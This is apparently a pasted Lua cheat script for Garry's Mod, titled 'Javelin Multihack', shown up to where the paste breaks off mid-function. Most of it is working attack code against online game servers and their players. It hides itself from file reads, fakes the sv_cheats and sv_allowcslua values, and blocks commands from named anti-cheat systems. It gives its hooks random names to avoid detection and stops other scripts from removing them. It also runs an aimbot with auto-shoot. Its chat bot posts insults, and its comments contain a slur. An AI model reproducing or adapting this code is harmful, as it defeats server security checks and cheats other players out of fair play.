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a guest
Oct 21st, 2016
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  1. --Ringo pasted this--
  2. jav_version = "Javelin Multihack 0.85"
  4. print("Javelin loading...")
  6. GColScheme = Color(250, 150, 0, 255)
  8. local oConCommand = "deaglelogs is shit"
  10. local oldRead = file.Read
  12. function file.Read( fn, path )
  13. if string.find(fn, "javelin*") then
  14. MsgC( Color( 255, 150, 0 ), "[Javelin] Blocked a lua stealing attempt!" )
  15. else
  16. return oldRead( fn, path )
  17. end
  18. end
  20. local function RecvPlayerKilledByPlayer()
  22. local victim = net.ReadEntity();
  23. local inflictor = net.ReadString();
  24. local attacker = net.ReadEntity();
  26. if ( !IsValid( attacker ) ) then return end
  27. if ( !IsValid( victim ) ) then return end
  29. GAMEMODE:AddDeathNotice( attacker:Name(), attacker:Team(), inflictor, victim:Name(), victim:Team() )
  30. if GetConVarNumber("jav_chatbot") == 1 then
  31. if attacker == LocalPlayer() then
  32. RunConsoleCommand("say", "rekt")
  33. end
  36. if victim == LocalPlayer() then
  37. RunConsoleCommand("say", "fuck off you spastic")
  38. end
  39. end
  41. end
  43. net.Receive( "PlayerKilledByPlayer", RecvPlayerKilledByPlayer )
  46. /*------------------------------------------
  47. Let's Start with some basic convar protection
  48. ------------------------------------------*/
  50. local OriginalGetConVarNumber = GetConVarNumber;
  52. function GetConVarNumber( name )
  53. if ( name == "sv_allowcslua" or name == "sv_cheats" or name == "host_framerate" or name == "mat_fullbright") then
  54. return 0;
  55. else
  56. return OriginalGetConVarNumber( name );
  57. end
  58. end
  60. /*------------------------------------------
  61. And a basic rcc scrambler
  62. ------------------------------------------*/
  64. local badcmds = { -- commands to be blocked
  65. "__ac",
  66. "__imacheater", -- yeah but nah
  67. "gm_possess",
  68. "achievementRefresh", -- fuck you lifepunch
  69. "__uc_", -- RIOT
  70. "_____b__c",
  71. "___m",
  72. "sc",
  73. "bg",
  74. "bm",
  75. "kickme",
  76. "gw_iamacheater",
  77. "imafaggot", -- no u
  78. "birdcage_browse",
  79. "reportmod",
  80. "_fuckme", -- lol ok
  81. "st_openmenu",
  82. "_NOPENOPE",
  83. "__ping",
  84. "ar_check",
  85. "GForceRecoil",
  86. "~__ac_auth",
  87. "blade_client_check",
  88. "blade_client_detected_message",
  89. "disconnect",
  90. "exit",
  91. "retry",
  92. "kill",
  93. "-voicerecord",
  94. "+voicerecord", -- mic snoopers go home
  95. "dac_imcheating", -- fuck u bich
  96. "dac_pleasebanme", -- fuck u bich
  97. "_hz_perp_bans_2hz1", -- rip hellzone AC
  98. "rdm" -- rip simple anticheat
  99. }
  101. local old_rcc = RunConsoleCommand;
  103. function RunConsoleCommand(cmd,...)
  104. if !table.HasValue(badcmds,cmd) then
  105. return old_rcc(cmd,...)
  106. else
  107. MsgC( Color( 255, 150, 0 ), "[Javelin] Blocked Malicious Concommand:"..cmd )
  108. return
  109. end
  110. end
  112. /*------------------------------------------
  113. Hellzone Perp stuff
  114. ------------------------------------------*/
  116. _G.RunCheck = function() print("Fuck off killslick") end -- RIP hellzone anticheat
  117. timer.Simple(1, function()
  118. if AccountCreationScreen then
  119. AccountCreationScreen:Remove(); -- go fuck yourself
  120. end
  122. hook.Remove("PlayerBindPress", "BlockPhysgunWheelSpeedGlitch") -- no seriously go fuck yourself
  124. end)
  127. /*------------------------------------------
  128. Fuck your hook checker v2 electric boogaloo
  129. ------------------------------------------*/
  131. -- this thing isnt used in any normal addons i know of so may as well just nuke it entirely
  132. /*
  133. local FuckHooks = hook.GetTable
  134. function hook.GetTable( )
  135. MsgC( Color( 255, 150, 0 ), "[Javelin] Blocked an attempt to sniff your hook table" )
  136. end
  137. */
  140. /*------------------------------------------
  141. AutoAim (Originally coded by rabidtoaster, integrated and modified by LegendofRobbo)
  142. ------------------------------------------*/
  144. if SERVER then return end
  146. local AA = {}
  148. local concommand = concommand
  149. local cvars = cvars
  150. local debug = debug
  151. local ents = ents
  152. local file = file
  153. local hook = hook
  154. local math = math
  155. local spawnmenu = spawnmenu
  156. local string = string
  157. local surface = surface
  158. local table = table
  159. local timer = timer
  160. local util = util
  161. local vgui = vgui
  163. local Angle = Angle
  164. local CreateClientConVar = CreateClientConVar
  165. local CurTime = CurTime
  166. local ErrorNoHalt = ErrorNoHalt
  167. local FrameTime = FrameTime
  168. local GetConVarString = GetConVarString
  169. local GetViewEntity = GetViewEntity
  170. local include = include
  171. local ipairs = ipairs
  172. local LocalPlayer = LocalPlayer
  173. local pairs = pairs
  174. local pcall = pcall
  175. local print = print
  176. local RunConsoleCommand = RunConsoleCommand
  177. local ScrH = ScrH
  178. local ScrW = ScrW
  179. local tonumber = tonumber
  180. local type = type
  181. local unpack = unpack
  182. local ValidEntity = IsValid
  183. local Vector = Vector
  185. do
  186. local hooks = {}
  187. local created = {}
  188. local function CallHook(self, name, args)
  189. if !hooks[name] then return end
  190. for funcName, _ in pairs(hooks[name]) do
  191. local func = self[funcName]
  192. if func then
  193. local ok, err = pcall(func, self, unpack(args or {}))
  194. if !ok then
  195. ErrorNoHalt(err .. "\n")
  196. elseif err then
  197. return err
  198. end
  199. end
  200. end
  201. end
  202. local function RandomName()
  203. local random = ""
  204. for i = 1, math.random(4, 10) do
  205. local c = math.random(65, 116)
  206. if c >= 91 && c <= 96 then c = c + 6 end
  207. random = random .. string.char(c)
  208. end
  209. return random
  210. end
  211. local function AddHook(self, name, funcName)
  212. // If we haven't got a hook for this yet, make one with a random name and store it.
  213. // This is so anti-cheats can't detect by hook name, and so we can remove them later.
  214. if !created[name] then
  215. local random = RandomName()
  216. hook.Add(name, random, function(...) return CallHook(self, name, {...}) end)
  217. created[name] = random
  218. end
  220. hooks[name] = hooks[name] or {}
  221. hooks[name][funcName] = true
  222. end
  224. local cvarhooks = {}
  225. local function GetCallbackTable(convar)
  226. local callbacks = cvars.GetConVarCallbacks(convar)
  227. if !callbacks then
  228. cvars.AddChangeCallback(convar, function() end)
  229. callbacks = cvars.GetConVarCallbacks(convar)
  230. end
  231. return callbacks
  232. end
  234. local function AddCVarHook(self, convar, funcName, ...)
  235. local hookName = "CVar_" .. convar
  236. if !cvarhooks[convar] then
  237. local random = RandomName()
  239. local callbacks = GetCallbackTable(convar)
  240. callbacks[random] = function(...)
  241. CallHook(self, hookName, {...})
  242. end
  244. cvarhooks[convar] = random
  245. end
  246. AddHook(self, hookName, funcName)
  247. end
  249. // Don't let other scripts remove our hooks.
  250. local oldRemove = hook.Remove
  251. function hook.Remove(name, unique)
  252. if created[name] == unique then return end
  253. oldRemove(name, unique)
  254. end
  256. // Removes all hooks, useful if reloading the script.
  257. local function RemoveHooks()
  258. for hookName, unique in pairs(created) do
  259. oldRemove(hookName, unique)
  260. end
  261. for convar, unique in pairs(cvarhooks) do
  262. local callbacks = GetCallbackTable(convar)
  263. callbacks[unique] = nil
  264. end
  265. end
  267. // Add copies the script can access.
  268. AA.AddHook = AddHook
  269. AA.AddCVarHook = AddCVarHook
  270. AA.CallHook = CallHook
  271. AA.RemoveHooks = RemoveHooks
  272. end
  274. concommand.Add("jav_aa_reload", function()
  275. AA:CallHook("Shutdown")
  276. print("Removing hooks...")
  277. AA:RemoveHooks()
  279. AA = nil
  280. local info = debug.getinfo(1, "S")
  281. if info && info.short_src then
  282. if string.Left(info.short_src, 3) == "lua" then
  283. info.short_src = string.sub(info.short_src, 5)
  284. end
  285. print("Reloading (" .. info.short_src .. ")...")
  286. include(info.short_src)
  287. else
  288. print("file error detected, reload manually.")
  289. end
  290. end)
  292. // ##################################################
  293. // MetaTables
  294. // ##################################################
  296. local function GetMeta(name)
  297. return table.Copy(FindMetaTable(name) or {})
  298. end
  300. local AngM = GetMeta("Angle")
  301. local CmdM = GetMeta("CUserCmd")
  302. local EntM = GetMeta("Entity")
  303. local PlyM = GetMeta("Player")
  304. local VecM = GetMeta("Vector")
  307. // ##################################################
  308. // Targetting - Positions
  309. // ##################################################
  311. AA.ModelTarget = {}
  312. function AA:SetModelTarget(model, targ)
  313. self.ModelTarget[model] = targ
  314. end
  315. function AA:BaseTargetPosition(ent)
  316. // The eye attachment is a lot more stable than bones for players.
  317. if type(ent) == "Player" then
  318. if GetConVarNumber("jav_aa_headshot") == 1 then
  319. local head = EntM["LookupAttachment"](ent, "eyes")
  320. if head then
  321. local pos = EntM["GetAttachment"](ent, head)
  322. if pos then
  323. return pos.Pos - (AngM["Forward"](pos.Ang) * 2)
  324. end
  325. end
  326. end
  327. else
  328. local bone = EntM["LookupBone"](ent, "ValveBiped.Bip01_Spine2")
  329. if bone then
  330. local pos = EntM["GetBonePosition"](ent, bone)
  331. if pos then
  332. return pos - (AngM["Forward"](pos.Ang) * 1)
  333. end
  334. end
  335. end
  337. // Check if the model has a special target assigned to it.
  338. local special = self.ModelTarget[string.lower(EntM["GetModel"](ent) or "")]
  339. if special then
  340. // It's a string - look for a bone.
  341. if type(special) == "string" then
  342. local bone = EntM["LookupBone"](ent, special)
  343. if bone then
  344. local pos = EntM["GetBonePosition"](ent, bone)
  345. if pos then
  346. return pos
  347. end
  348. end
  349. // It's a Vector - return a relative position.
  350. elseif type(special) == "Vector" then
  351. return EntM["LocalToWorld"](ent, special)
  352. // It's a function - do something fancy!
  353. elseif type(special) == "function" then
  354. local pos = pcall(special, ent)
  355. if pos then return pos end
  356. end
  357. end
  359. // Try and use the head bone, found on all of the player + human models.
  360. local bone = "ValveBiped.Bip01_Spine2"
  361. local head = EntM["LookupBone"](ent, bone)
  362. if head then
  363. local pos = EntM["GetBonePosition"](ent, head)
  364. if pos then
  365. return pos
  366. end
  367. end
  369. // Give up and return the center of the entity.
  370. return EntM["LocalToWorld"](ent, EntM["OBBCenter"](ent))
  371. end
  372. function AA:TargetPosition(ent)
  373. local targetPos = self:BaseTargetPosition(ent)
  375. local ply = LocalPlayer()
  376. if ValidEntity(ply) then
  377. targetPos = self:CallHook("TargetPrediction", {ply, ent, targetPos}) or targetPos
  378. end
  380. return targetPos
  381. end
  383. AA:SetModelTarget("models/crow.mdl", Vector(0, 0, 5)) // Crow.
  384. AA:SetModelTarget("models/pigeon.mdl", Vector(0, 0, 5)) // Pigeon.
  385. AA:SetModelTarget("models/seagull.mdl", Vector(0, 0, 6)) // Seagull.
  386. AA:SetModelTarget("models/combine_scanner.mdl", "Scanner.Body") // Scanner.
  387. AA:SetModelTarget("models/hunter.mdl", "MiniStrider.body_joint") // Hunter.
  388. AA:SetModelTarget("models/combine_turrets/floor_turret.mdl", "Barrel") // Turret.
  389. AA:SetModelTarget("models/dog.mdl", "Dog_Model.Eye") // Dog.
  390. AA:SetModelTarget("models/vortigaunt.mdl", "ValveBiped.Head") // Vortigaunt.
  391. AA:SetModelTarget("models/antlion.mdl", "Antlion.Body_Bone") // Antlion.
  392. AA:SetModelTarget("models/antlion_guard.mdl", "Antlion_Guard.Body") // Antlion guard.
  393. AA:SetModelTarget("models/antlion_worker.mdl", "Antlion.Head_Bone") // Antlion worker.
  394. AA:SetModelTarget("models/zombie/fast_torso.mdl", "ValveBiped.HC_BodyCube") // Fast zombie torso.
  395. AA:SetModelTarget("models/zombie/fast.mdl", "ValveBiped.HC_BodyCube") // Fast zombie.
  396. AA:SetModelTarget("models/headcrabclassic.mdl", "HeadcrabClassic.SpineControl") // Normal headcrab.
  397. AA:SetModelTarget("models/headcrabblack.mdl", "HCBlack.body") // Poison headcrab.
  398. AA:SetModelTarget("models/headcrab.mdl", "HCFast.body") // Fast headcrab.
  399. AA:SetModelTarget("models/zombie/poison.mdl", "ValveBiped.Headcrab_Cube1") // Poison zombie.
  400. AA:SetModelTarget("models/zombie/classic.mdl", "ValveBiped.HC_Body_Bone") // Zombie.
  401. AA:SetModelTarget("models/zombie/classic_torso.mdl", "ValveBiped.HC_Body_Bone") // Zombie torso.
  402. AA:SetModelTarget("models/zombie/zombie_soldier.mdl", "ValveBiped.HC_Body_Bone") // Zombine.
  403. AA:SetModelTarget("models/combine_strider.mdl", "Combine_Strider.Body_Bone") // Strider.
  404. AA:SetModelTarget("models/combine_dropship.mdl", "D_ship.Spine1") // Combine dropship.
  405. AA:SetModelTarget("models/combine_helicopter.mdl", "Chopper.Body") // Combine helicopter.
  406. AA:SetModelTarget("models/gunship.mdl", "Gunship.Body") // Combine gunship.
  407. AA:SetModelTarget("models/lamarr.mdl", "HeadcrabClassic.SpineControl") // Lamarr!
  408. AA:SetModelTarget("models/mortarsynth.mdl", "Root Bone") // Mortar synth.
  409. AA:SetModelTarget("models/synth.mdl", "Bip02 Spine1") // Synth.
  410. AA:SetModelTarget("models/vortigaunt_slave.mdl", "ValveBiped.Head") // Vortigaunt slave.
  413. // ##################################################
  414. // Targetting - General
  415. // ##################################################
  417. AA.NPCDeathSequences = {}
  418. function AA:AddNPCDeathSequence(model, sequence)
  419. self.NPCDeathSequences = self.NPCDeathSequences or {}
  420. self.NPCDeathSequences[model] = self.NPCDeathSequences[model] or {}
  421. if !table.HasValue(self.NPCDeathSequences[model]) then
  422. table.insert(self.NPCDeathSequences[model], sequence)
  423. end
  424. end
  426. AA:AddNPCDeathSequence("models/barnacle.mdl", 4)
  427. AA:AddNPCDeathSequence("models/barnacle.mdl", 15)
  428. AA:AddNPCDeathSequence("models/antlion_guard.mdl", 44)
  429. AA:AddNPCDeathSequence("models/hunter.mdl", 124)
  430. AA:AddNPCDeathSequence("models/hunter.mdl", 125)
  431. AA:AddNPCDeathSequence("models/hunter.mdl", 126)
  432. AA:AddNPCDeathSequence("models/hunter.mdl", 127)
  433. AA:AddNPCDeathSequence("models/hunter.mdl", 128)
  435. function AA:IsValidTarget(ent)
  436. // We only want players/NPCs.
  437. local typename = type(ent)
  438. if typename != "NPC" && typename != "Player" then return false end
  440. // No invalid entities.
  441. if !ValidEntity(ent) then return false end
  443. // Go shoot yourself, emo kid.
  444. local ply = LocalPlayer()
  445. if ent == ply then return false end
  447. local weap = PlyM["GetActiveWeapon"](ply)
  448. if ValidEntity(weap) then
  449. local class = EntM["GetClass"](weap)
  450. if class == "weapon_physgun" or class == "weapon_physcannon" or class == "gmod_tool" or class == "gmod_camera" then return false end
  451. end
  453. if typename == "Player" then
  454. if !PlyM["Alive"](ent) then return false end // Dead players FTL.
  455. if GetConVarNumber("jav_aa_targetteam") != 1 && PlyM["Team"](ent) == PlyM["Team"](ply) then return false end
  456. if GetConVarNumber("jav_aa_targetfriends") != 1 && ent:GetFriendStatus() == "friend" then return false end
  457. if EntM["GetMoveType"](ent) == MOVETYPE_OBSERVER then return false end // No spectators.
  458. if EntM["GetMoveType"](ent) == MOVETYPE_NONE then return false end
  459. //if pl["Team"](ent) == 1001 then return false end
  460. end
  462. if typename == "NPC" then
  463. if EntM["GetMoveType"](ent) == MOVETYPE_NONE then return false end // No dead NPCs.
  465. // No dying NPCs.
  466. local model = string.lower(EntM["GetModel"](ent) or "")
  467. if table.HasValue(self.NPCDeathSequences[model] or {}, EntM["GetSequence"](ent)) then return false end
  468. end
  469. end
  470. function AA:BaseBlocked(target, offset)
  471. local ply = LocalPlayer()
  472. if !ValidEntity(ply) then return end
  474. // Trace from the players shootpos to the position.
  475. local shootPos = PlyM["GetShootPos"](ply)
  476. local targetPos = self:TargetPosition(target)
  478. if offset then targetPos = targetPos + offset end
  480. local trace = util.TraceLine({start = shootPos, endpos = targetPos, filter = {ply, target}, mask = MASK_SHOT})
  481. local wrongAim = self:AngleBetween(PlyM["GetAimVector"](ply), VecM["GetNormal"](targetPos - shootPos)) > 2
  483. // If we hit something, we're "blocked".
  484. if trace.Hit && trace.Entity != target then
  485. return true, wrongAim
  486. end
  488. // It is not blocked.
  489. return false, wrongAim
  490. end
  491. function AA:TargetBlocked(target)
  492. if !target then target = self:GetTarget() end
  493. if !target then return end
  495. local blocked, wrongAim = self:BaseBlocked(target)
  496. return blocked, wrongAim
  497. end
  500. function AA:SetTarget(ent)
  501. if self.Target && !ent then
  502. self:CallHook("TargetLost")
  503. elseif !self.Target && ent then
  504. self:CallHook("TargetGained")
  505. elseif self.Target && ent && self.Target != ent then
  506. self:CallHook("TargetChanged")
  507. end
  509. self.Target = ent
  510. end
  511. function AA:GetTarget()
  512. if ValidEntity(self.Target) != false then
  513. return self.Target
  514. else
  515. return false
  516. end
  517. end
  518. function AA:FindTarget()
  519. if GetConVarNumber("jav_autoaim_enabled") != 1 then return end
  521. local ply = LocalPlayer()
  522. if !ValidEntity(ply) then return end
  524. local maxAng = GetConVarNumber("jav_aa_angle")
  525. local aimVec, shootPos = PlyM["GetAimVector"](ply), PlyM["GetShootPos"](ply)
  528. // Filter out targets.
  529. local targets = ents.GetAll()
  530. for i, ent in pairs(targets) do
  531. if self:IsValidTarget(ent) == false then
  532. targets[i] = nil
  533. end
  534. end
  536. local closestTarget, lowestAngle = _, maxAng
  537. for _, target in pairs(targets) do
  538. if GetConVarNumber("jav_aa_ignorewalls") == 1 || !self:TargetBlocked(target) then
  539. local targetPos = self:TargetPosition(target)
  540. local angle = self:AngleBetween(AngM["Forward"](self:GetView()), VecM["GetNormal"](targetPos - shootPos))
  542. if angle < lowestAngle then
  543. lowestAngle = angle
  544. closestTarget = target
  545. end
  546. end
  547. end
  549. self:SetTarget(closestTarget)
  550. end
  551. AA:AddHook("Think", "FindTarget")
  554. // ##################################################
  555. // Fake view
  556. // ##################################################
  558. AA.View = Angle(0, 0, 0)
  559. function AA:GetView()
  560. return self.View * 1
  561. end
  562. function AA:KeepView()
  563. if GetConVarNumber("jav_autoaim_enabled") != 1 then return end
  565. local ply = LocalPlayer()
  566. if !ValidEntity(ply) then return end
  568. self.View = EntM["EyeAngles"](ply)
  569. end
  570. AA:AddHook("OnToggled", "KeepView")
  572. local sensitivity = 0.022
  573. function AA:RotateView(cmd)
  574. self.View.p = math.Clamp(self.View.p + (CmdM["GetMouseY"](cmd) * sensitivity), -89, 89)
  575. self.View.y = math.NormalizeAngle(self.View.y + (CmdM["GetMouseX"](cmd) * sensitivity * -1))
  576. end
  578. function AA:FakeView(ply, origin, angles, FOV)
  579. if GetConVarNumber("jav_autoaim_enabled") != 1 && !self.SetAngleTo then return end
  580. if GetViewEntity() != LocalPlayer() then return end
  582. local base = GAMEMODE:CalcView(ply, origin, self.SetAngleTo or self.View, FOV) or {}
  583. base.angles = base.angles or (self.AngleTo or self.View)
  584. base.angles.r = 0 // No crappy screen tilting in ZS.
  585. return base
  586. end
  587. AA:AddHook("CalcView", "FakeView")
  590. function AA:TargetPrediction(ply, target, targetPos)
  591. local weap = PlyM["GetActiveWeapon"](ply)
  592. if ValidEntity(weap) then
  593. local class = EntM["GetClass"](weap)
  594. if class == "weapon_crossbow" then
  595. local dist = VecM["Length"](targetPos - PlyM["GetShootPos"](ply))
  596. local time = (dist / 3500) + 0.05 // About crossbow bolt speed.
  597. targetPos = targetPos + (EntM["GetVelocity"](target) * time)
  598. end
  600. local mul = 0.0075
  601. //targetPos = targetPos - (e["GetVelocity"](ply) * mul)
  602. end
  604. return targetPos
  605. end
  606. AA:AddHook("TargetPrediction", "TargetPrediction")
  608. // ##################################################
  609. // Aim
  610. // ##################################################
  612. function AA:SetAngle(ang)
  613. self.SetAngleTo = ang
  614. end
  615. AA.LastAttack = 0
  616. function AA:SetAimAngles(cmd)
  617. self:RotateView(cmd)
  619. if GetConVarNumber("jav_autoaim_enabled") != 1 && !self.SetAngleTo then return end
  621. local ply = LocalPlayer()
  622. if !ValidEntity(ply) then return end
  624. // We're aiming with the view, normally.
  625. local targetAim = self:GetView()
  627. // If we have a target, aim at them!
  628. local target = self:GetTarget()
  629. if target then
  630. local targetPos = self:TargetPosition(target)
  631. targetAim = VecM["Angle"](targetPos - ply:GetShootPos())
  632. end
  634. // We're following the view, until we fire.
  635. if GetConVarNumber("jav_aa_snaponaim") == 1 then
  636. local time = CurTime()
  637. if PlyM["KeyDown"](ply, IN_ATTACK2) || (GetConVarNumber("jav_aa_autoshoot") / 0.02) != 0 then
  638. self.LastAttack = time
  639. end
  640. if CurTime() - self.LastAttack > GetConVarNumber("jav_aa_snaponaimgrace") then
  641. targetAim = self:GetView()
  642. end
  643. end
  645. // We want to change to whatever was SetAngle'd.
  646. if self.SetAngleTo then
  647. targetAim = self.SetAngleTo
  648. end
  650. // Smooth aiming.
  651. local smooth = 0
  652. if smooth > 0 then
  653. local current = CmdM["GetViewAngles"](cmd)
  655. // Approach the target angle.
  656. current = self:ApproachAngle(current, targetAim, smooth * FrameTime())
  657. current.r = 0
  659. // If we're just following the view, we don't need to smooth it.
  660. if self.RevertingAim then
  661. local diff = self:NormalizeAngle(current - self:GetView())
  662. if math.abs(diff.p) < 1 && math.abs(diff.y) < 1 then self.RevertingAim = false end
  663. elseif targetAim == self:GetView() then
  664. current = targetAim
  665. end
  667. // Check if the angles are the same...
  668. if self.SetAngleTo then
  669. local diff = self:NormalizeAngle(current - self.SetAngleTo)
  670. if math.abs(diff.p) < 1 && math.abs(diff.y) < 1 then self.SetAngleTo = nil end
  671. end
  673. aim = current
  674. else
  675. aim = targetAim
  676. self.SetAngleTo = nil
  677. end
  679. // Set the angles.
  680. CmdM["SetViewAngles"](cmd, aim)
  681. local sensitivity = 0.22
  682. local diff = aim - CmdM["GetViewAngles"](cmd)
  683. CmdM["SetMouseX"](cmd, diff.y / sensitivity)
  684. CmdM["SetMouseY"](cmd, diff.p / sensitivity)
  687. // Change the players movement to be relative to their view instead of their aim.
  688. local move = Vector(CmdM["GetForwardMove"](cmd), CmdM["GetSideMove"](cmd), 0)
  689. local norm = VecM["GetNormal"](move)
  690. local set = AngM["Forward"](VecM["Angle"](norm) + (aim - self:GetView())) * VecM["Length"](move)
  691. CmdM["SetForwardMove"](cmd, set.x)
  692. CmdM["SetSideMove"](cmd, set.y)
  693. end
  694. AA:AddHook("CreateMove", "SetAimAngles")
  696. function AA:RevertAim()
  697. self.RevertingAim = true
  698. end
  699. AA:AddHook("TargetLost", "RevertAim")
  700. function AA:StopRevertAim()
  701. self.RevertingAim = false
  702. end
  703. AA:AddHook("TargetGained", "RevertAim")
  705. // When we turn off the bot, we want our aim to go back to our view.
  706. function AA:ViewToAim()
  707. if GetConVarNumber("jav_autoaim_enabled") != 1 then return end
  708. self:SetAngle(self:GetView())
  709. end
  710. AA:AddHook("OnToggled", "ViewToAim")
  713. // ##################################################
  714. // HUD
  715. // ##################################################
  716. function AA:DrawTarget()
  717. if GetConVarNumber("jav_autoaim_enabled") != 1 then return end
  719. local target = self:GetTarget()
  720. if !target then return end
  721. if target:Alive() == false then return end
  723. // Change colour on the block status.
  724. /*
  725. local blocked, aimOff = self:TargetBlocked()
  726. if blocked then
  727. surface.SetDrawColor(255, 0, 0, 255) // Red.
  728. elseif aimOff then
  729. surface.SetDrawColor(255, 255, 0, 255) // Yellow.
  730. else
  731. surface.SetDrawColor(0, 255, 0, 255) // Green.
  732. end
  733. */
  735. // Get the onscreen coordinates for the target.
  736. local pos = self:TargetPosition(target)
  738. local screen = VecM["ToScreen"](pos)
  739. local x, y = screen.x, screen.y
  741. surface.SetDrawColor(255,255,255,255)
  742. surface.DrawRect( x + 10, y -1, 20, 2 )
  743. surface.DrawRect( x - 30, y -1, 20, 2 )
  744. surface.DrawRect( x - 1, y +20, 2, 20 )
  745. surface.DrawRect( x - 1, y -40, 2, 20 )
  746. end
  747. AA:AddHook("HUDPaint", "DrawTarget")
  750. AA.ScreenMaxAngle = {
  751. Length = 0,
  752. FOV = 0,
  753. MaxAngle = 0
  754. }
  755. function AA:DrawMaxAngle()
  756. if GetConVarNumber("jav_autoaim_enabled") != 1 then return end
  758. // We need a player for this to work...
  759. local ply = LocalPlayer()
  760. if !ValidEntity(ply) then return end
  762. local info = self.ScreenMaxAngle
  763. local maxang = GetConVarNumber("jav_aa_angle")
  765. local fov = PlyM["GetFOV"](ply)
  766. if GetViewEntity() == ply && (maxang != info.MaxAngle || fov != info.FOV) then
  767. local view = self:GetView()
  768. view.p = view.p + maxang
  770. local screen = (PlyM["GetShootPos"](ply) + (AngM["Forward"](view) * 100))
  771. screen = VecM["ToScreen"](screen)
  773. info.Length = math.abs((ScrH() / 2) - screen.y)
  775. info.MaxAngle = maxang
  776. info.FOV = fov
  777. end
  779. local length = info.Length
  781. local cx, cy = ScrW() / 2, ScrH() / 2
  782. for x = -1, 1 do
  783. for y = -1, 1 do
  784. if x != 0 || y != 0 then
  785. local add = VecM["GetNormal"](Vector(x, y, 0)) * length
  786. surface.DrawCircle(cx, cy, add.x, Color(255,150,0,255))
  787. end
  788. end
  789. end
  791. end
  792. AA:AddHook("HUDPaint", "DrawMaxAngle")
  794. // ##################################################
  795. // Auto-shoot
  796. // ##################################################
  798. AA.AttackDown = false
  799. function AA:SetShooting(bool)
  800. if self.AttackDown == bool then return end
  801. self.AttackDown = bool
  803. local pre = {[true] = "+", [false] = "-"}
  804. RunConsoleCommand(pre[bool] .. "attack")
  805. end
  807. AA.NextShot = 0
  808. function AA:Shoot()
  809. if GetConVarNumber("jav_autoaim_enabled") != 1 then
  810. self:SetShooting(false)
  811. return
  812. end
  814. // Get the maximum distance.
  815. local maxDist = (GetConVarNumber("jav_aa_autoshoot") / 0.02)
  816. if maxDist == 0 then return end
  818. // Check we've got something to shoot at...
  819. local target = self:GetTarget()
  820. if !target then return end
  822. // Don't shoot until we can hit, you idiot!
  823. local blocked, wrongAim = self:TargetBlocked(target)
  824. if blocked || wrongAim then return end
  826. // We're gonna need the player object in a second.
  827. local ply = LocalPlayer()
  828. if !ValidEntity(ply) then return end
  830. // Check we're within our maximum distance.
  831. local targetPos = self:TargetPosition(target)
  832. local distance = VecM["Length"](targetPos - ply:GetShootPos())
  833. if distance > maxDist && maxDist != -1 then return end
  835. // Check if it's time to shoot yet.
  836. if CurTime() < self.NextShot then return end
  838. // Check we got our weapon.
  839. local weap = PlyM["GetActiveWeapon"](ply)
  840. if !ValidEntity(weap) then return end
  842. // Shoot!
  843. self:SetShooting(true)
  844. // If we're semi-auto, we want to stop holding down fire.
  845. if self:IsSemiAuto(weap) then
  846. timer.Simple(0.05, function() self:SetShooting(false) end)
  847. end
  849. // Set the next time to shoot.
  850. self.NextShot = CurTime() + 0.1
  851. end
  852. AA:AddHook("Think", "Shoot")
  854. // When we lose our target we stop shooting.
  855. function AA:StopShooting()
  856. self:SetShooting(false)
  857. end
  858. AA:AddHook("TargetLost", "StopShooting")
  860. // ##################################################
  861. // Useful functions
  862. // ##################################################
  864. function AA:AngleBetween(a, b)
  865. return math.deg(math.acos(VecM["Dot"](a, b)))
  866. end
  868. function AA:NormalizeAngle(ang)
  869. return Angle(math.NormalizeAngle(ang.p), math.NormalizeAngle(ang.y), math.NormalizeAngle(ang.r))
  870. end
  872. function AA:ApproachAngle(start, target, add)
  873. local diff = self:NormalizeAngle(target - start)
  875. local vec = Vector(diff.p, diff.y, diff.r)
  876. local len = VecM["Length"](vec)
  877. vec = VecM["GetNormal"](vec) * math.min(add, len)
  879. return start + Angle(vec.x, vec.y, vec.z)
  880. end
  882. local notAuto = {"weapon_pistol", "weapon_rpg", "weapon_357", "weapon_crossbow"}
  883. function AA:IsSemiAuto(weap)
  884. if !ValidEntity(weap) then return end
  885. return (weap.Primary && !weap.Primary.Automatic) || table.HasValue(notAuto, EntM["GetClass"](weap))
  886. end
  907. /*----------------------------------------------------------
  908. Utilities
  909. ----------------------------------------------------------*/
  910. function CreatePos(v)
  911. local ply = LocalPlayer()
  912. local center = v:LocalToWorld( v:OBBCenter() )
  913. local min, max = v:OBBMins(), v:OBBMaxs()
  914. local dim = max - min local z = max + min
  915. local frt = ( v:GetForward() ) * ( dim.y / 2 )
  916. local rgt = ( v:GetRight() ) * ( dim.x / 2 )
  917. local top = ( v:GetUp() ) * ( dim.z / 2 )
  918. local bak = ( v:GetForward() * -1 ) * ( dim.y / 2 )
  919. local lft = ( v:GetRight() * -1 ) * ( dim.x / 2 )
  920. local btm = ( v:GetUp() * -1 ) * ( dim.z / 2 )
  921. local s = 1
  922. local FRT = center + frt / s + rgt / s + top / s; FRT = FRT:ToScreen()
  923. local BLB = center + bak / s + lft / s + btm / s; BLB = BLB:ToScreen()
  924. local FLT = center + frt / s + lft / s + top / s; FLT = FLT:ToScreen()
  925. local BRT = center + bak / s + rgt / s + top / s; BRT = BRT:ToScreen()
  926. local BLT = center + bak / s + lft / s + top / s; BLT = BLT:ToScreen()
  927. local FRB = center + frt / s + rgt / s + btm / s; FRB = FRB:ToScreen()
  928. local FLB = center + frt / s + lft / s + btm / s; FLB = FLB:ToScreen()
  929. local BRB = center + bak / s + rgt / s + btm / s; BRB = BRB:ToScreen()
  930. local z = 100
  931. if ( v:Health() <= 50 ) then z = 100 end
  932. local x, y = ( ( v:Health() / 100 ) ), 1
  933. if ( v:Health() <= 0 ) then x = 1 end
  934. local FRT3 = center + frt + rgt + top / x; FRT3 = FRT3; FRT3 = FRT3:ToScreen()
  935. local BLB3 = center + bak + lft + btm / x; BLB3 = BLB3; BLB3 = BLB3:ToScreen()
  936. local FLT3 = center + frt + lft + top / x; FLT3 = FLT3; FLT3 = FLT3:ToScreen()
  937. local BRT3 = center + bak + rgt + top / x; BRT3 = BRT3; BRT3 = BRT3:ToScreen()
  938. local BLT3 = center + bak + lft + top / x; BLT3 = BLT3; BLT3 = BLT3:ToScreen()
  939. local FRB3 = center + frt + rgt + btm / x; FRB3 = FRB3; FRB3 = FRB3:ToScreen()
  940. local FLB3 = center + frt + lft + btm / x; FLB3 = FLB3; FLB3 = FLB3:ToScreen()
  941. local BRB3 = center + bak + rgt + btm / x; BRB3 = BRB3; BRB3 = BRB3:ToScreen()
  942. local x, y, z = 1.1, 0.9, 1
  943. local FRT2 = center + frt / y + rgt / z + top / x; FRT2 = FRT2:ToScreen()
  944. local BLB2 = center + bak / y + lft / z + btm / x; BLB2 = BLB2:ToScreen()
